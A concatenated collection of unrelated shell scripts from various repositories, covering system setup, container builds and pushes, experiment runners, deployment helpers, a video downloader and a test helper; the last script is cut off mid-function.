echo "${FAIL}|||${NC} Failed to change shell to new Bash"
exit 1
fi
fi
exit 0
}
function install_dotfiles {
echo "${INFO}|||${NC} Installing dotfiles..."
exit 0
}
function install_all {
echo "${INFO}|||${NC} Installing everything ❤️ ..."
audit_macOS
install_dotfiles
install_xcode
install_brew
install_gpg
install_tower
install_bailiff
customise_defaults
exit 0
}
function main {
local var=${1:-"usage"}
if [ "$#" -ne 0 ] ; then
#No point checking connection if no args passed
echo "${INFO}|||${NC} Checking internet connection!"
if ping -c 4 8.8.8.8 | grep 'No route' ; then
echo "${FAIL}|||${NC} No internet connection. Exiting..."
exit 1
else
echo "${PASS}|||${NC} Internet connected"
fi
fi
if [[ "${var}" = "audit" ]]; then
audit_macOS
elif [[ "${var}" = "customise" ]]; then
customise_defaults
elif [[ "${var}" = "bailiff" ]]; then
install_bailiff
elif [[ "${var}" = "gpgtools" ]]; then
install_gpg
elif [[ "${var}" = "sublime" ]]; then
install_sublime
elif [[ "${var}" = "tower" ]]; then
install_tower
elif [[ "${var}" = "xcode" ]]; then
install_xcode
elif [[ "${var}" = "brew" ]]; then
install_brew
elif [[ "${var}" = "dotfiles" ]] ; then
install_dotfiles
elif [[ "${var}" = "all" ]]; then
install_all
else
usage
fi
cleanup
}
main "$@"
#TODO:
# - Install BlockBlock, Lulu, Do Not Disturb and What's Your Sign Applications
# List above may change, recently started using them so who knows...
| true |
7a7106e3853c5cb512a3c49ed0a218a6d889e193 | Shell | uint0/aws-mysfits-all-in-one | /scripts/build_container.sh | UTF-8 | 688 | 3.15625 | 3 | [] | no_license | #!/bin/sh
set -e
mm_aws_accountid=$(aws sts get-caller-identity --query Account --output text)
mm_aws_region=$(aws configure get region)
mm_container_name="mythicalmysfits/service"
mm_ecr_url=$mm_aws_accountid.dkr.ecr.$mm_aws_region.amazonaws.com
echo "(1/4) Building Container"
docker build -t $mm_container_name $(dirname $0)/../assets/app
echo "(2/4) Tagging Container"
docker tag $mm_container_name:latest $mm_ecr_url/$mm_container_name:latest
echo "(3/4) Logging in to ecr"
aws ecr get-login-password --region $mm_aws_region | docker login --username AWS --password-stdin $mm_ecr_url
echo "(4/4) Pushing container"
docker push $mm_ecr_url/$mm_container_name:latest
echo "Done" | true |
a803046a97c3efe365d135eabe0fd1eb7a393588 | Shell | kergoth/dotfiles | /semi-external/scripts/sherlock | UTF-8 | 196 | 2.515625 | 3 | [] | no_license | #!/bin/sh
set -eu
cd "$(git-get https://github.com/sherlock-project/sherlock 2>/dev/null)"
if [ ! -e Pipfile.lock ]; then
pipenv install -r requirements.txt
fi
pipenv run ./sherlock.py "$@"
| true |
e16fd75cd485a81b67ccb64e00066563ac676d1c | Shell | mej571/MCTF-video-coding | /src/mctf.sh | UTF-8 | 715 | 3.265625 | 3 | [] | no_license | #! /bin/bash
## Add a final symbol.
function end {
(echo -e "" >&2)
# (echo -n "[1;0m" >&2)
exit
}
# (echo -en "[0;32m" >&2)
if [ -z "$*" ]; then
(echo -e "" >&2)
(echo -e "+-------------+" >&2)
(echo -e "| MCTF parser |" >&2)
(echo -e "+-------------+" >&2)
(echo -e "" >&2)
(echo -e MCTF=\"$MCTF\" >&2)
(echo -e "" >&2)
(echo -e "Available commands:" >&2)
(echo -e "" >&2)
ls $MCTF/bin
(echo -e "" >&2)
(echo -e "Type: \n\n mctf command --help \n\nto get information about the command line parameters" >&2)
end
fi
(echo [`pwd`] "$MCTF/bin/$@" >&2)
echo "$MCTF/bin/$@" >> trace
#set -x
"$MCTF/bin/$@"
#set +x
exit $?
# (echo -en "[1;0m" >&2)
| true |
39a6d99aae38cf0f9247a4793c155a0577b2b8bb | Shell | tpruzina/ifj14 | /scripts/release.sh | UTF-8 | 1,230 | 3.046875 | 3 | [] | no_license | #!/bin/bash
if [ $# -ne 1 ]; then
echo "supply login name as parameter" && exit 1
else
make || exit 1
echo "########## creating ${1}.zip"
#tar uklada veci vcetne cesty takze si vytvorime .tmp adresar
mkdir -p .tmp && cd .tmp || exit 1
cp \
../rozdeleni \
../rozsireni \
../src/Makefile \
../src/ast.c \
../src/ast.h \
../src/defines.h \
../src/gc.c \
../src/gc.h \
../src/ial.c \
../src/ial.h \
../src/interpret.c \
../src/interpret.h \
../src/log.c \
../src/log.h \
../src/main_interpret.c \
../src/parser.c \
../src/parser.h \
../src/scanner.c \
../src/scanner.h \
../src/stack.c \
../src/stack.h \
../src/string.c \
../src/string.h \
../src/structs.h \
../docs/dokumentace/dokumentace.pdf \
. || exit 1
echo "########## building && testing #########"
make || exit 1
make clean || exit 1
echo "########## build successful ############"
echo "########## creating archive ############"
zip ../${1}.zip * || exit 1
cd .. && rm -r .tmp
echo "########## created ################"
echo "######### running is_it_ok.sh #####"
bash scripts/is_it_ok.sh ${1}.zip .tmp2 || exit 1
rm -rf .tmp2
echo "######### is_it_ok DONE ###########"
fi
| true |
2d5bf3e04d3a0e34a3567c40d38d5c55449b18ee | Shell | cleka/colossus-titan | /Colossus/bin/runinternal | UTF-8 | 640 | 3.171875 | 3 | [] | no_license | #! /bin/sh
#
# A simple wrapper to run a bunch of games inside the same JVM
# Can run each game from scratch, or all of them from the same
# savegame file.
#
IROUNDS=5
if [ $# -gt 0 ]
then
IROUNDS=$1
shift
fi
echo "Starting Colossus to run internally $IROUNDS games."
if [ $# -gt 0 ]
then
FILE=$1
echo "Games will start from savegame $FILE."
shift
LOADOPTION=" --load $FILE "
fi
java -Djava.util.logging.config.file=logging.properties -Dnet.sf.colossus.stressTestRounds=$IROUNDS -Dnet.sf.colossus.forceViewBoard=true -Dnet.sf.colossus.endAfterFirstBattle=true -Xmx256M -jar Colossus.jar -gS -q -A $LOADOPTION
# EOF
| true |
f34b158ec2c098da2ee42d791e01fc35d992e6b6 | Shell | ozel/batchpix | /batchpixel.sh | UTF-8 | 1,282 | 3.140625 | 3 | [] | no_license | #!/bin/sh
abort=0;
#echo -n "Checking FTDI Drivers..."
#if [ -f "/usr/local/lib/libftd2xx.so" ] && [ -f "/usr/lib/libftd2xx.so" ] && [ -f "/usr/local/lib/libftd2xx.so.1.1.12" ]; then
#echo " OK.";
#else
#echo " NOT FOUND!";
#echo -n "Installing FTDI Drivers (requires root permissions)...";
#sudo cp _other_/drivers/libftd2xx.so.1.1.12 /usr/local/lib/libftd2xx.so.1.1.12
#sudo ln -s /usr/local/lib/libftd2xx.so.1.1.12 /usr/local/lib/libftd2xx.so
#sudo ln -s /usr/local/lib/libftd2xx.so.1.1.12 /usr/lib/libftd2xx.so
#echo " OK.\n"
#abort=1;
#fi
#echo -n "Checking FTDI Drivers permissions..."
#if [ -f "/etc/udev/rules.d/pixelman.rules" ]; then
# echo " OK.";
#else
# echo " NOT FOUND!";
# echo -n "Setting permissions (requires root permissions)...";
# sudo cp _other_/drivers/pixelman.rules /etc/udev/rules.d/
# echo " OK.\n"
# abort=1;
#fi
#if [ $abort -eq 1 ]; then
# echo "Please disconnect and reconnect the devices and start Pixelman again.\n"
# exit 0;
#fi
#FTDISIO_PRESENT=`lsmod | grep ftdi_sio`
#if [ -n "$FTDISIO_PRESENT" ]; then
# echo "In order to use Fitpix/USB devices the ftdi_sio driver has to be temporalily removed. This will require root permissions..."
# sudo rmmod ftdi_sio
#fi
export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
./batchpixel.exe $1
| true |
0f5e753b2edf63dc60aa65bb4772c41df8d73a4e | Shell | curranjm/umbalgo | /deploy.sh | UTF-8 | 580 | 3.09375 | 3 | [] | no_license | #!/usr/bin/env bash
set -v
WD=$(pwd)
PARSE=${WD}/tools/parser.py
IN=${WD}/src/algo
OUT=/var/www/html/
rm -rf ${OUT}/*
mkdir -p ${OUT}/js/algo
pushd .
cd ${IN}
for f in *.js
do
${PARSE} $f ${OUT}/js/algo/$f
done
popd
pushd .
cd src
../node_modules/.bin/babel -d ${OUT}/js/libs libs
../node_modules/.bin/babel -d ${OUT}/js/content content
popd
cp src/html/*.html ${OUT}
mkdir -p ${OUT}/css
cp src/css/*.css ${OUT}/css
cp -r d3/vizlib ${OUT}/js/libs
mkdir -p ${OUT}/images
cp src/images/*.svg ${OUT}/images
cp src/images/*.ico ${OUT}/images
cp src/images/*.png ${OUT}/images
| true |
a889855d08c4024ce6cde14e70cde429c39c2eb8 | Shell | cwru-robotics/turtlebot-estimation | /scripts/setupEnvironment | UTF-8 | 585 | 2.59375 | 3 | [] | no_license | #!/bin/bash
scripts_dir="$HOME/thesis/scripts"
xilinx_install_dir="$HOME/Applications/Xilinx"
dtc_install_dir="$HOME/thesis/xlnx_sources/dtc"
u_boot_install_dir="$HOME/thesis/xlnx_sources/u-boot-xlnx"
source $xilinx_install_dir/Vivado/2016.1/settings64.sh
source $xilinx_install_dir/SDK/2016.1/settings64.sh
export CROSS_COMPILE=arm-xilinx-linux-gnueabi-
export ARCH=arm
export UIMAGE_LOADADDR=0x8000 # For xilinx kernel
export LOADADDR=0x8000 # For ADI kernel
cd $dtc_install_dir && export PATH=`pwd`:$PATH
cd $u_boot_install_dir/tools && export PATH=`pwd`:$PATH
cd $scripts_dir
| true |
904b7d57cc0816c331e746266ebf9777c655c1b1 | Shell | paragsahu/brigde-labz-assignment | /Day-5,6/headtail.sh | UTF-8 | 113 | 2.9375 | 3 | [] | no_license | #!/bin/bash -x
x=$(( RANDOM % 2 ));
if [ $x -gt 0 ];
then
echo "$x It's HEAD"
else
echo "$x It's TAILS"
fi
| true |
e0d4fa698f574c28941d0a19766d111bb37dd751 | Shell | carze/vappio | /vappio-scripts/vp-checkandterminate-cluster | UTF-8 | 335 | 2.859375 | 3 | [] | no_license | #!/bin/bash
#USAGE: vp-checkandterminate-cluster true mycluster
#Terminate cluster
if [ "$1" == "1" ] || [ "$1" == "true" ]
then
if [ "$2" == "local" ]
then
vp-terminate-cluster --cluster=$2 --auth-token=`generateAuthToken.py /mnt/keys/devel1.pem.pub`
else
vp-terminate-cluster --cluster=$2
fi
fi
| true |
31efd1242f4cc913dc13a6dc6bfac4c02553db61 | Shell | cmantas/asap.cslab | /experiments/spark_kmeans_text.sh | UTF-8 | 3,326 | 3.265625 | 3 | [] | no_license | #!/bin/bash
source $(dirname $0)/config.info #loads the parameters
source $(dirname $0)/common.sh #loads the common functions
output_file="spark_kmeans_text.out"
input_dir=~/Data/ElasticSearch_text_docs
TOOLS_JAR=~/bin/lib/asapTools.jar
#create HDFS files
hadoop_input=/user/$USER/input/kmeans_text_seqfiles
hdfs dfs -rm -r $hadoop_input &>/dev/null
hdfs dfs -mkdir -p $hadoop_input &>/dev/null
spark_vectors=/tmp/spark_tfidf
moved_mahout=/tmp/moved_mahout; hdfs dfs -mkdir -p $moved_mahout
moved_arff=/tmp/moved_vectors.arff
spark_tfidf(){
docs=$1
minDF=$2
# TF/IDF
hdfs dfs -rm -r $spark_vectors &>/dev/null
echo -n "[EXPERIMENT] TF-IDF on $docs documents, minDF=$minDF: "
input_size=$(hdfs_size $hadoop_input)
asap run tfidf spark $hadoop_input $spark_vectors $minDF &> spark_tfidf.out
output_size=$(hdfs_size $spark_vectors)
check_spark spark_tfidf.out
dimensions=1048576
echo $dimensions features, $(peek_time) sec
asap report -e spark_tfidf -cm -m documents=$docs dimensions=$dimensions \
minDF=$minDF input_size=$input_size output_size=$output_size
}
spark_kmeans(){
input_size=$(hdfs_size $spark_vectors)
echo -n "[EXPERIMENT] spark K-means with K=$k: "
asap run kmeans spark $spark_vectors $k $max_iterations &> spark_kmeans.out
output_size=0
#check_spark spark_kmeans.out # IDK why this fails (OK is never printed)
rm -r /tmp/spark* 2>/dev/null
echo $(peek_time) sec
#DEBUG show any exceptions but igore them
cat spark_kmeans.out | grep Exception
asap report -e spark_kmeans_text -cm -m documents=$docs k=$k dimensions=$dimensions \
minDF=$minDF input_size=$input_size output_size=$output_size
}
spark2mahout(){
docs=$1
dimensions=$2
# Move spark to mahout
echo -n "[EXPERIMENT] Move Spark->Mahout on $docs documents "
asap run move spark2mahout $spark_vectors $moved_mahout &> spark2mahout.out
check spark2mahout.out
input_size=$(hdfs_size $spark_vectors)
output_size=$(hdfs_size $moved_mahout)
echo $(peek_time) sec
asap report -e spark2mahout -cm -m documents=$docs minDF=$minDF dimensions=$dimensions \
input_size=$input_size output_size=$output_size
}
spark2arff(){
docs=$1
dimensions=$2
# Move spark to arff
input_size=$(hdfs_size $spark_vectors)
echo -n "[EXPERIMENT] Move Spark->arff on $docs documents"
asap run move spark2arff $spark_vectors $moved_arff &> arff2spark.out
check arff2spark.out
output_size=$(size $moved_arff)
echo , $(peek_time) sec
asap report -e spark2arff -cm -m documents=$docs minDF=$minDF dimensions=$dimensions \
input_size=$input_size output_size=$output_size
}
for ((docs=min_documents; docs<=max_documents; docs+=documents_step)); do
#re-load the parameters on each iteration for live re-configuration
hdfs dfs -rm -r $hadoop_input &>/dev/null
echo "[PREP] Loading $docs text files"
asap run move dir2sequence $input_dir $hadoop_input $docs &> dir2sequence.out
check dir2sequence.out
#for (( minDF=max_minDF; minDF>=min_minDF; minDF-=minDF_step)); do
minDF=10
spark_tfidf $docs $minDF
spark2mahout $docs $dimensions
spark2arff $docs $dimensions
hdfs dfs -rm -r "/tmp/moved*" &>/dev/null
for((k=min_k; k<=max_k; k+=k_step)); do
spark_kmeans
done
#done
done
| true |
57a7146b0429e2b027f9b10cf0295f27937f1435 | Shell | nickali/configs | /zsh/zshrc | UTF-8 | 2,117 | 3 | 3 | [] | no_license |
export PATH="/usr/local/sbin:/usr/local/bin:$PATH"
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
#export GEM_HOME=~/.gem
#export GEM_PATH=~/.gem
source $(brew --prefix)/share/antigen/antigen.zsh
antigen bundle zsh-users/zsh-completions
antigen bundle zsh-users/zsh-syntax-highlighting
antigen bundle zpm-zsh/title
antigen bundle gretzky/auto-color-ls
antigen theme romkatv/powerlevel10k
source $(dirname $(gem which colorls))/tab_complete.sh
antigen bundle urbainvaes/fzf-marks
antigen apply
eval "$(zoxide init zsh --cmd dir --hook prompt)"
alias lc='colorls -lA --sd'
alias ls='colorls --sd'
alias cat='bat'
alias less='bat'
alias more='bat'
#alias 'grep'='batgrep --color --pager=bat'
alias man='batman'
alias vim='nvim'
alias vi='nvim'
alias journal='vi $(echo ${(L)$(date +%B-%Y)}).md'
alias gitemacs='cd ~/WIP/config/dot-emacs-dot-d'
PROMPT_TITLE='$USER@$HOST:$PWD'
export W3M_IMG2SIXEL=/usr/local/bin/img2sixel
export PATH=/usr/local/opt/texinfo/bin:$PATH
function rg()
{
/usr/local/bin/rg -p "$@" | bat
}
function lazygit() {
git add .
git commit -a -m "$1"
git push
}
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
alias icat="kitty +kitten icat"
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
fh() {
eval $( ([ -n "$ZSH_NAME" ] && fc -l 1 || history) | fzf +s --tac | sed 's/ *[0-9]* *//')
}
fd() {
local dir
dir=$(find ${1:-.} -path '*/\.*' -prune \
-o -type d -print 2> /dev/null | fzf +m) &&
cd "$dir"
}
test -e "${HOME}/.iterm2_shell_integration.zsh" && source "${HOME}/.iterm2_shell_integration.zsh"
autoload -U +X bashcompinit && bashcompinit
complete -o nospace -C /usr/local/bin/terraform terraform
| true |
ac8bb414fe3b1e11ebe6aa08fc9e1b6006c5b549 | Shell | schu/habitat-demo-service | /plan.sh | UTF-8 | 377 | 2.78125 | 3 | [] | no_license | pkg_name=demo-service
pkg_origin=schu
pkg_version=0.10.0
pkg_description="Habitat demo service"
pkg_maintainer="schu"
pkg_deps=("core/glibc")
pkg_build_deps=("core/go" "core/make")
pkg_bin_dirs=("/usr/bin")
do_build() {
make
}
do_install() {
install -m 0755 -D "demo-service" "$pkg_prefix/usr/bin/demo-service"
install -m 0644 -D "message-default.txt" "$pkg_prefix/"
}
| true |
0d5661f92e678d58e1191c77ca1db33bc5c03661 | Shell | vorlock/a-config-mgmt | /bin/deploy-clusters.sh | UTF-8 | 511 | 2.640625 | 3 | [] | no_license | #!/bin/bash
for cname in aks eks gke; do
export KUBECONFIG=${HOME}/work/kpmg/multicloud/${cname}-kubectl.conf
#kubectl apply -f - <<EOF
cat > /tmp/dupa.${cname} <<EOF
apiVersion: configmanagement.gke.io/v1
kind: ConfigManagement
metadata:
name: config-management
spec:
# clusterName is required and must be unique among all managed clusters
clusterName: ${cname}-anthos-01
git:
syncRepo: https://github.com/vorlock/a-config-mgmt.git
syncBranch: master
secretType: none
EOF
done
| true |
170b11443584a2d88db5dc002a154722dac520e5 | Shell | Japrin/cancer | /repseq/run.MiXCR.sh | UTF-8 | 3,336 | 3.171875 | 3 | [] | no_license | #!/bin/bash
sDir=`dirname $0`
iniFile="$sDir/../parameter/init_human.sh"
optBam=false
while getopts b opt
do
case $opt in
b)
optBam=true
;;
'?')
echo "Usage: $0 invalid option -$OPTARG"
echo "Usage: $0 [-b bamfile] <outDir> <sampleID> <fq1> [fq2]"
exit 1
;;
esac
done
shift $((OPTIND-1))
if [ $# -lt 3 ]
then
echo "Usage: $0 [-b bamfile] <outDir> <sampleID> <fq1> [fq2]"
exit 1
fi
outDir=$1
sampleID=$2
fq1=$3
fq2=$4
optT=4
mkdir -p $outDir
source $iniFile
module load java/1.8.0_171
module load bamUtil/1.0.14
#mixcrBin="/Share/BP/zhenglt/01.bin/repSeq/mixcr-2.0.2/mixcr"
mixcrBin="/WPSnew/zhenglt/01.bin/repseq/mixcr/mixcr-2.1.11/mixcr"
optM=6
echo begin at: `date`
echo $optBam
if $optBam;then
max_reads=`echo 250000*$optM | bc`
echo java -Xmx${optM}g -jar $picardDIR/picard.jar SortSam I=$fq1 O=$outDir/$sampleID.sort.name.bam MAX_RECORDS_IN_RAM=$max_reads TMP_DIR=$outDir SO=queryname VALIDATION_STRINGENCY=SILENT
java -Xmx${optM}g -jar $picardDIR/picard.jar SortSam I=$fq1 O=$outDir/$sampleID.sort.name.bam MAX_RECORDS_IN_RAM=$max_reads TMP_DIR=$outDir SO=queryname VALIDATION_STRINGENCY=SILENT
### for STAR alignment
samtools view -F 0x100 $outDir/$sampleID.sort.name.bam | bam bam2FastQ --readName --in - --firstOut $outDir/$sampleID.forMiXCR.R1.fq.gz --secondOut $outDir/$sampleID.forMiXCR.R2.fq.gz
######bam bam2FastQ --readName --in $outDir/$sampleID.sort.name.bam --firstOut $outDir/$sampleID.forMiXCR.R1.fq.gz --secondOut $outDir/$sampleID.forMiXCR.R2.fq.gz
fq1=$outDir/$sampleID.forMiXCR.R1.fq.gz
fq2=$outDir/$sampleID.forMiXCR.R2.fq.gz
echo rm $outDir/$sampleID.sort.name.bam
rm $outDir/$sampleID.sort.name.bam
else
echo "nothing to do"
fi
echo fq1: $fq1
echo fq2: $fq2
$mixcrBin align -f -p rna-seq -OallowPartialAlignments=true --save-description --save-reads -t $optT \
-r $outDir/$sampleID.MiXCR.log.align.txt \
$fq1 $fq2 \
$outDir/$sampleID.MiXCR.alignments.vdjca
$mixcrBin assemblePartial -f -p \
-r $outDir/$sampleID.MiXCR.log.assemble.txt \
$outDir/$sampleID.MiXCR.alignments.vdjca \
$outDir/$sampleID.MiXCR.alignmentsRescued_1.vdjca
$mixcrBin assemblePartial -f -p \
-r $outDir/$sampleID.MiXCR.log.assemble.txt \
$outDir/$sampleID.MiXCR.alignmentsRescued_1.vdjca \
$outDir/$sampleID.MiXCR.alignmentsRescued_2.vdjca
$mixcrBin assemble -f -t $optT -OaddReadsCountOnClustering=true -ObadQualityThreshold=15 \
-r $outDir/$sampleID.MiXCR.log.assembleClones.txt \
$outDir/$sampleID.MiXCR.alignmentsRescued_2.vdjca \
$outDir/$sampleID.MiXCR.clones.clns
$mixcrBin exportClones -f --filter-out-of-frames --filter-stops $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.clones.txt
$mixcrBin exportClonesPretty $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.clonesPretty.txt
$mixcrBin exportClones -f --filter-out-of-frames --filter-stops --chains TCR $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.TCR.clones.txt
$mixcrBin exportClonesPretty --chains TCR $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.TCR.clonesPretty.txt
if $optBam;then
echo rm $fq1 $fq2
rm $fq1 $fq2
fi
$sDir/TCRasm.MiXCR.slim.pl \
-s $sampleID \
$outDir/$sampleID.MiXCR.TCR.clones.txt \
$outDir/$sampleID.MiXCR.TCR.clones.slim.txt
echo end at: `date`
| true |
34d39421bcd2b07a1e8e69d12b39e4343a6000d2 | Shell | arangodb/1mDocsPerSec | /doit2.sh | UTF-8 | 913 | 2.578125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
function waitvoll() {
while [ `date +%S` != "00" ] ; do
echo Waiting for full minute...
sleep 0.5
done
}
export ACTION="WARMUP"
export READPERCENTS=100
waitvoll
./run.sh ${ACTION} 0
export ACTION="READ"
export READPERCENTS=100
waitvoll
./run.sh ${ACTION}1x20 0
waitvoll
./run.sh ${ACTION}1x40 0 0
waitvoll
./run.sh ${ACTION}1x60 0 0 0
waitvoll
./run.sh ${ACTION}1x80 0 0 0 0
waitvoll
./run.sh ${ACTION}1x100 0 0 0 0 0
export ACTION="WRITE"
export READPERCENTS=0
waitvoll
./run.sh ${ACTION}1x20 0
waitvoll
./run.sh ${ACTION}1x40 0 0
waitvoll
./run.sh ${ACTION}1x60 0 0 0
waitvoll
./run.sh ${ACTION}1x80 0 0 0 0
waitvoll
./run.sh ${ACTION}1x100 0 0 0 0 0
export ACTION="RW"
export READPERCENTS=50
waitvoll
./run.sh ${ACTION}1x20 0
waitvoll
./run.sh ${ACTION}1x40 0 0
waitvoll
./run.sh ${ACTION}1x60 0 0 0
waitvoll
./run.sh ${ACTION}1x80 0 0 0 0
waitvoll
./run.sh ${ACTION}1x100 0 0 0 0 0
| true |
f45a693469bccfcb1806f173eb566a3b3a9b0b01 | Shell | TommoCrabb/Telly-Wangler | /downloader.bash | UTF-8 | 3,540 | 4.46875 | 4 | [] | no_license | #!/usr/bin/env bash
# set -x
# Use these as tags to format text from the "echo -e" command (eg: echo -e "This is some ${RED}red${REG} text.")
RED='\033[0;31m' # Red
BLU='\033[0;34m' # Blue
PUR='\033[0;35m' # Purple
REG='\033[0m' # Regular (use this as a closing tag)
this_file=$( readlink -e "${0}" )
this_dir=$( dirname "${this_file}" )
timestamp=$( date +%Y-%m-%d_%H%M%S )
error_file="${timestamp}_error"
log_file="${timestamp}_log"
fail_file="${timestamp}_fail"
done_file="${timestamp}_done"
function throw_error
# Takes a string as argument and writes it to both ${error_file} and stdout (in red text).
# If a 2nd argument of '1' is supplied, print exit message & exit.
{
echo -e "${RED}ERROR: ${1}${REG}"
echo -e "${1}" >> "${error_file}"
[[ "${2}" == 1 ]] && { echo "${RED}EXITING...${REG}" ; exit ; }
}
function log_this
# Takes a string as argument and writes it to both ${log_file} and stdout (in blue text).
{
echo -e "${BLU}${1}${REG}"
echo -e "${1}" >> "${log_file}"
}
function failed_download
# Takes a string as argument and writes it to both ${fail_file} and stdout (in red text).
{
echo -e "${RED}FAILED DOWNLOAD: ${1}${REG}"
echo -e "${1}" >> "${fail_file}"
}
function finished_download
{
echo -e "${BLU}FINISHED DOWNLOAD: ${1}${REG}"
echo -e "${1}" >> "${done_file}"
}
# function change_dir
# # Takes the location of a directory as argument and tries to cd into it. Exits on failure.
# {
# if [[ "${PWD}" != "${1}" ]] ; then
# cd "${1}" || { throw_error "COULDN'T 'cd' INTO '${1}'. EXITING." ; ; }
# fi
# }
function check_file
# Takes 2 strings. With the 1st, each character represents a tests to be performed on a file or directory.
# 2nd string is the file or directory to be tested. If any test fails, immediately returns a value of '1'.
{
local t="${1}"
local f="${2}"
local i
for (( i=0 ; $i < ${#t} ; i++ )) ; do
case "${t:$i:1}" in
r) [[ -r "$f" ]] || { throw_error "CAN'T READ '${f}'." ; return 1 ; } ;;
w) [[ -w "$f" ]] || { throw_error "CAN'T WRITE TO '${f}'." ; return 1 ; } ;;
x) [[ -x "$f" ]] || { throw_error "CAN'T EXECUTE '${f}'." ; return 1 ; } ;;
f) [[ -f "$f" ]] || { throw_error "CAN'T FIND FILE '${f}'." ; return 1 ; } ;;
d) [[ -d "$f" ]] || { throw_error "CAN'T FIND DIRECTORY '${f}'." ; return 1 ; } ;;
*) throw_error "FUNCTION 'check_file' FAILED TO MATCH '${t:$i:1}'." ; return 1 ;;
esac
done
}
function set_config_file
# Takes 1 string as argument and uses it to set the location of the ${config_file} that youtube-dl should use.
{
config_file="${this_dir}/youtube-dl-${1}.conf"
check_file fr "${config_file}" || throw_error "Couldn't find config file ${config_file}." 1
}
function download_file
{
youtube-dl --config-location "${config_file}" "${1}" && finished_download "${1}" || failed_download "${1}"
}
function get_simple
{
set_config_file "${1}"
download_file "${2}"
}
function check_source
{
case "${1}" in
\#*) log_this "SKIPPING COMMENTED LINE: ${1}" ;;
daily) get_daily ;;
*iview.abc.net.au/*) get_simple "abc" "${1}" ;;
*sbs.com.au/ondemand/video/*) get_simple "sbs" "${1}" ;;
nine) get_9 "${1}" ;;
seven) get_7 "${1}" ;;
ten) get_10 "${1}" ;;
*twitch.tv*) get_twitch "${1}" ;;
*youtube.com*) get_youtube "${1}" ;;
*) throw_error "FAILED TO RECOGNISE INPUT '${1}'" ;;
esac
}
for arg in "${@}" ; do
if check_file fr "${arg}" ; then
while read line ; do check_source "${line}" ; done < "${arg}"
else
check_source "${arg}"
fi
done
| true |
deb02be2d06aba7af94fbd48c561aa3b68905b11 | Shell | michael-pryor/Hologram | /deploy/package | UTF-8 | 461 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/sh -e
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SOURCE_PATH="${DIR}/.."
DEST_PATH="${DIR}/../builds"
if [ ! -d "${DEST_PATH}" ]; then
mkdir "${DEST_PATH}"
fi
cd "${SOURCE_PATH}"
now=$(date +"%d_%m_%Y_%H_%M_%S")
DEST_FULL_PATH="${DEST_PATH}/hologram_server_${now}.tgz"
tar czvfh "${DEST_FULL_PATH}" PythonServer bin apps security/generate.sh security/hologram_private.cer
echo "Resulting package written to: ${DEST_FULL_PATH}"
exit 0
| true |
6ac09c4d55c5906d1567903f3917ee670aa8b5c6 | Shell | mizdra/isucon10 | /sokkyou/deploy_nginx.sh | UTF-8 | 330 | 2.5625 | 3 | [] | no_license | #!/bin/bash
source ./sokkyou/sokkyou.sh
echo "⚡️ Deploy nginx"
for REMOTE in ${NGINX[@]}; do
echo "🚀 Deploy nginx ($REMOTE $USER)"
RSYNC conf/nginx/nginx.conf /etc/nginx/nginx.conf
RSYNC conf/nginx/sites-available/isuumo.conf /etc/nginx/sites-available/isuumo.conf
ssh $REMOTE "sudo systemctl restart nginx"
done
| true |
ead0079e6d4e71aa1379261b39547132cf09e158 | Shell | enesutku07/lfscript | /scripts/blfs-18652-unchecked/fuse2 | UTF-8 | 1,431 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# The instructions in this file are extracted from
# 'Beyond Linux From Scratch' (2017-04-29 / r18652) but are modified for use
# with LFScript 4 which installs the software to a fake root directory.
#
# Beyond Linux From Scratch is released under the MIT license.
# Copyright (C) 2001-2017, The BLFS Development Team
WGETLIST="https://github.com/libfuse/libfuse/releases/download/fuse-2.9.7/fuse-2.9.7.tar.gz"
MD5SUMLIST="9bd4ce8184745fd3d000ca2692adacdb"
###############################################
installation() { # INSTALLING SYSTEM SOFTWARE #
###############################################
./configure --prefix=/usr \
--disable-static \
--exec-prefix=/
make
make DESTDIR=$PWD/Dest install
cp -v Dest/lib/*.so.* ${FAKEROOT}/lib
ln -sv ../../lib/libfuse.so.2 ${FAKEROOT}/usr/lib/libfuse.so
ln -sv ../../lib/libulockmgr.so.1 ${FAKEROOT}/usr/lib/libulockmgr.so
cp -v Dest/lib/pkgconfig/* ${FAKEROOT}/usr/lib/pkgconfig
cp -v Dest/bin/* ${FAKEROOT}/bin
cp -v Dest/sbin/mount.fuse ${FAKEROOT}/sbin
install -vdm755 ${FAKEROOT}/usr/include/fuse
cp -v Dest/usr/include/*.h ${FAKEROOT}/usr/include
cp -v Dest/usr/include/fuse/*.h ${FAKEROOT}/usr/include/fuse/
cp -v Dest/usr/share/man/man1/* ${FAKEROOT}/usr/share/man/man1
#################
} # END OF FILE #
#################
| true |
eaaee1df5506d588802ccf313361f89f8c3cf4b2 | Shell | liloman/heal-bitrots | /tests/test_helper.bash | UTF-8 | 1,813 | 3.21875 | 3 | [] | no_license | #!/usr/bin/env bash
# LC_ALL=en_US.UTF-8
# LANGUAGE=en_US.UTF-8
LANG=C
check_fail() {
local temp=/tmp/bats.log
> $temp
for line; do
echo "$line" >> $temp
done
cat /tmp/.heal_bitrot.log >> $temp
}
generate_bitrot() {
local dest=$1 temp=/tmp/temp-base
local -i count=$(($2*100)) percent=${3:-5}
mkdir -p "${dest%/*}"
local dir_base=${dest%%/*}
touch "$dest" $temp
#let's make sure they shared the same timestamp
touch "$dest" -r $temp
dd if=/dev/zero of="$dest" bs=1k count=$count &>/dev/null
run $r "$dir_base"
#modify it and change modify date to base-file, simulate bitrot so
